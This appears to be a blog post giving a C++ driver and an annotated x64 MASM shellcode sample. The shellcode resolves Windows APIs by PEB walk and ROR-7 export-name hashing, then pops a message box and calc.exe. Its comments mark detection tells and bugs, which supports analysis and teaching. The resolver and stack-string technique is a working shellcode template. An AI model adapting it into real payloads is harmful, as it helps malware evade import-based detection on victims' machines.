Main.cpp
// Test driver for the listing in Code.asm.
// _INT3 executes a software breakpoint so an analyst can attach a debugger
// and single-step the payload; PopCalculator then resolves Win32 APIs from
// the PEB/export tables and runs WinExec("calc.exe").
extern "C" void PopCalculator();
extern "C" void _INT3();

int main()
{
    // Breakpoint first: with no debugger attached this is expected to
    // surface as an unhandled breakpoint exception rather than continue.
    _INT3();

    // Does not return normally: the assembly ends the thread via ExitThread.
    PopCalculator();

    return 0;
}
Code.asm
PopCalculator proto
_INT3 proto

;-----------------------------------------------------------------------
; x64 MASM shellcode sample: locate kernel32 through the PEB loader list,
; resolve APIs by hashing export names, then WinExec("calc.exe").
; Kept as an analysis sample. From a detection standpoint the tell-tale
; parts are: the PEB walk via gs:[60h], the export-table walk with a
; ROR-7 name hash, the 8-byte stack-string pushes ("user32.dll",
; "calc.exe", "ExitThread"), and the GetProcAddress("ExitThread") lookup.
; None of the loops below is bounded (see the notes at each one), so a
; module or export that is missing makes the code spin or read past its
; table instead of failing cleanly.
;
; ROR-7 name hashes passed to FindApi:
;   WinExec        : 0x1A22F51
;   LoadLibrary    : 0x0C917432   (presumably LoadLibraryA -- the name is
;                                  passed as an 8-bit string)
;   MessageBoxA    : 0x1E380A6A
;   GetProcAddress : 0xBBAFDF85   (written as decimal 3148865413 below)
;-----------------------------------------------------------------------

.code

;-----------------------------------------------------------------------
; void _INT3(void)
; Software breakpoint so the payload can be stepped from its first
; instruction. Without a debugger attached this is a breakpoint exception.
;-----------------------------------------------------------------------
_INT3 proc
        int 3
        ret
_INT3 endp

;-----------------------------------------------------------------------
; void PopCalculator(void)
; ABI:   Microsoft x64 (called from C; ends the thread with ExitThread
;        instead of returning, so the trailing ret is normally unreached)
; Regs:  rsi = kernel32 base       (live for the whole function)
;        rbx = user32 base         (only until the next FindApi clobbers it)
;        r14 = most recently resolved function pointer
; Stack: 100h on entry plus three 16-byte string pushes and the 18h/20h/20h
;        parameter-space adjustments, 188h in total, which the final
;        add rsp, 188h undoes. With the 8 mod 16 entry alignment every
;        call site below lands on a 16-byte aligned rsp.
; Note:  rbx, rsi, rdi and r14 are callee-saved under Win64 and are not
;        preserved here; that only goes unnoticed because the function
;        never returns to its caller.
;-----------------------------------------------------------------------
PopCalculator proc
        sub rsp, 100h

        ;
        ; Get the kernel32 base address
        ;
        mov rax, gs:[60h]                       ; PEB
        mov rax, [rax+18h]                      ; Ldr
        mov rax, [rax+30h]                      ; InInitializationOrderModuleList
_kernel32:
        mov rsi, [rax+10h]                      ; DllBase
        mov rbx, [rax+40h]                      ; BaseDllName (the wide-string buffer, by the compare below)
        mov rax, [rax]                          ; advance to the next list entry
        cmp dword ptr [rbx+0Ch], 00320033h      ; chars 6-7 of the name == L"32" (kernel32 on a normal list)
        jnz _kernel32                           ; NOTE: unbounded -- spins forever if nothing matches

        ;
        ; Call LoadLibrary
        ;
        mov rcx, rsi                            ; kernel32 base
        mov rdx, 0C917432h                      ; hash(LoadLibrary)
        call FindApi
        mov r14, rax
        mov rbx, 6C6Ch                          ; "ll" + NULs
        push rbx
        mov rbx, 642E323372657375h              ; "user32.d"
        push rbx                                ; rsp -> "user32.dll"
        mov rcx, rsp                            ; lpLibFileName
        sub rsp, 18h                            ; parameter space; 18h also brings rsp to 16-byte alignment.
                                                ; NOTE: 8 bytes short of the 20h home space the ABI grants the
                                                ; callee; its 4th home slot overlaps the "user32.d" push, so this
                                                ; presumably works only because the callee does not home r9.
        call r14                                ; LoadLibrary("user32.dll")
        mov rbx, rax                            ; user32 base

        ;
        ; Call MessageBoxA
        ;
        mov rcx, rbx                            ; user32 base
        mov rdx, 1E380A6Ah                      ; hash(MessageBoxA)
        call FindApi                            ; clobbers rbx; the user32 base is not needed again
        mov r14, rax
        xor r9, r9                              ; uType    = 0
        xor r8, r8                              ; lpCaption = NULL
        xor rdx, rdx                            ; lpText    = NULL
        xor rcx, rcx                            ; hWnd      = NULL
        call r14                                ; MessageBoxA(NULL, NULL, NULL, 0) -- an empty box; same 18h as above serves as parameter space

        ;
        ; Call WinExec
        ;
        mov rcx, rsi                            ; kernel32 base
        mov rdx, 1A22F51h                       ; hash(WinExec)
        call FindApi
        mov r14, rax
        xor rax, rax
        push rax                                ; terminating zeros
        mov rax, 6578652e636c6163h              ; "calc.exe"
        push rax                                ; rsp -> "calc.exe"
        mov rcx, rsp                            ; lpCmdLine
        sub rsp, 20h                            ; 20h parameter (home) space
        mov rdx, 1                              ; uCmdShow = 1 (SW_SHOWNORMAL)
        call r14                                ; WinExec("calc.exe", 1)

        ;
        ; Call ExitThread -- resolved by name through GetProcAddress rather
        ; than by hash; the hash below is GetProcAddress's own
        ;
        mov rcx, rsi                            ; kernel32 base
        mov rdx, 3148865413                     ; = 0BBAFDF85h, hash(GetProcAddress)
        call FindApi
        mov r14, rax                            ; GetProcAddress
        mov rax, 006461h                        ; "ad" + NUL
        push rax
        mov rax, 6572685474697845h              ; "ExitThre"
        push rax                                ; rsp -> "ExitThread"
        mov rcx, rsi                            ; hModule    = kernel32
        mov rdx, rsp                            ; lpProcName
        sub rsp, 20h                            ; 20h parameter (home) space
        call r14                                ; GetProcAddress(kernel32, "ExitThread")
        mov r14, rax                            ; ExitThread
        add rsp, 188h                           ; 100h + 30h (pushes) + 18h + 20h + 20h: back to the entry rsp
        sub rsp, 18h                            ; parameter space; realigns rsp (entry rsp is 8 mod 16)
        xor rcx, rcx                            ; dwExitCode = 0
        call r14                                ; ExitThread(0) -- does not return
        ret                                     ; reached only if ExitThread somehow returned

;-----------------------------------------------------------------------
; FindApi -- resolve an export by ROR-7 name hash. A local label reached
; with call/ret from inside PopCalculator, not a separate proc.
; In:    rcx = DLL base (the module's IMAGE_DOS_HEADER)
;        rdx = hash of the export name
; Out:   rax = VA of the export
; Clobb: rbx, rdi, rcx, rdx, flags (rsi is saved and restored)
; Hash:  h = ror32(h, 7) + (signed char)c, for each byte of the name, h = 0 to start
; Notes: AddressOfNames is walked with no NumberOfNames bound, so an
;        unmatched hash reads past the table. Forwarder entries get no
;        special handling. e_lfanew is truncated to 10 bits (see below).
;-----------------------------------------------------------------------
FindApi:
        ;
        ; rcx - DLL base address
        ; rdx - function hash value
        ;
        sub rsp, 40h
        push rsi
        mov rdi, rdx                            ; rdi = wanted hash
        mov rbx, rcx                            ; rbx = module base
        mov rsi, [rbx+3Ch]                      ; e_lfanew, read as a qword (upper bytes are DOS-stub bytes)
        mov rax, rsi
        shl rax, 54
        shr rax, 54                             ; keep only the low 10 bits (assumes e_lfanew < 400h)
        mov rsi, [rbx+rax+88h]                  ; rsi = Export Table RVA (qword load also picks up the directory Size)
        shl rsi, 32
        shr rsi, 32                             ; keep only the low 32 bits, the RVA
        add rsi, rbx                            ; rsi = the base of Export Table
        push rsi                                ; kept for the ordinal/function lookups after the search
        mov esi, [rsi+20h]                      ; esi = RVA of AddressOfNames
        add rsi, rbx                            ; rsi = VA of AddressOfNames
        xor rcx, rcx
        dec ecx                                 ; ecx = -1 so the first inc yields index 0
find_loop:
        inc ecx                                 ; ecx = index of array
        lods dword ptr [rsi]                    ; eax = AddressOfNames[ecx] (an RVA); rsi += 4
        add rax, rbx                            ; rax = the base of a function string
        xor edx, edx                            ; edx = running hash, restarted per name
hash_loop:
        cmp byte ptr [rax], 0
        je isEqual
        ror edx, 7
        push rcx                                ; rcx (the name index) is borrowed for the byte below
        movsx ecx, byte ptr [rax]               ; sign-extended character
        add edx, ecx                            ; edx = one of function's hashes
        pop rcx
        inc rax
        jmp hash_loop
isEqual:
        cmp edx, edi
        jnz find_loop                           ; no match: next name (no upper bound on the index)
        pop rsi                                 ; rsi = the base of Export Table
        mov edx, [rsi+24h]                      ; edx = RVA of AddressOfNameOrdinals
        add rdx, rbx                            ; rdx = VA of AddressOfNameOrdinals
        movsx ecx, word ptr [rdx+rcx*2]         ; ecx = the index of AddressOfFunctions (sign-extended word; fine while ordinals < 8000h)
        mov edx, [rsi+1Ch]                      ; edx = RVA of AddressOfFunctions
        add rdx, rbx                            ; rdx = VA of AddressOfFunctions
        mov eax, [rdx+rcx*4]                    ; eax = the RVA of base of function
        add rax, rbx                            ; rax = the VA of base of function
        pop rsi
        add rsp, 40h
        ret
PopCalculator endp
end
标签:rcx,rsi,rbx,x64,mov,rdx,计算器,ShellCode,rax 来源: https://www.cnblogs.com/SuperGreen/p/16297129.html